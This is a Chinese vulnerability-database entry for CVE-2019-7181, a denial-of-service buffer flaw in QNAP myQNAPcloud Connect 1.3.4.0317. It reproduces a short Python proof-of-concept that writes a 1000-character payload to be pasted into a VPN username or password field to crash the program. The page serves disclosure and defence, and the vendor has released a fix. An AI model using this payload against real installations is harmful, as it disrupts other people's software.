QNAP Systems QNAP myQNAPcloud Connect 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1576814 漏洞类型 缓冲区错误
发布时间 2019-04-20 更新时间 2019-06-12
CVE编号 CVE-2019-7181 CNNVD-ID CNNVD-201904-944
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019040193
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201904-944
|漏洞详情
QNAP Systems myQNAPcloud Connect是中国威联通(QNAP Systems)公司的一款用于连接、分享和管理QNAP NAS文件的应用程序。 QNAP Systems QNAP myQNAPcloud Connect 1.3.4.0317版本中存在安全漏洞。攻击者可利用该漏洞造成拒绝服务。
|漏洞EXP
#!/usr/bin/python
# Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS
# Date: 19/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.qnap.com
# Version: 1.3.4.0317 and below are vulnerable
# Software Link: https://www.qnap.com/en/utilities/essentials
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP/7/10 (version 1.3.3.0925)
# CVE: CVE-2019-7181
# POC
# 1.) Generate qnap.txt
# 2.) Copy the contents of qnap.txt to the clipboard
# 3.) Paste the contents in any username/password field(Add or Edit VPN)
# 4.) Click ok, program crashes.
# This vulnerability was responsibly disclosed February 3, 2019, new version has been released.

buffer = "A" * 1000

payload = buffer
try:
    f=open("qnap.txt","w")
    print "[+] Creating %s bytes QNAP payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

|参考资料

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/152570/QNAP-myQNAPcloud-Connect-1.3.4.0317-Username-Password-Denial-Of-Service.html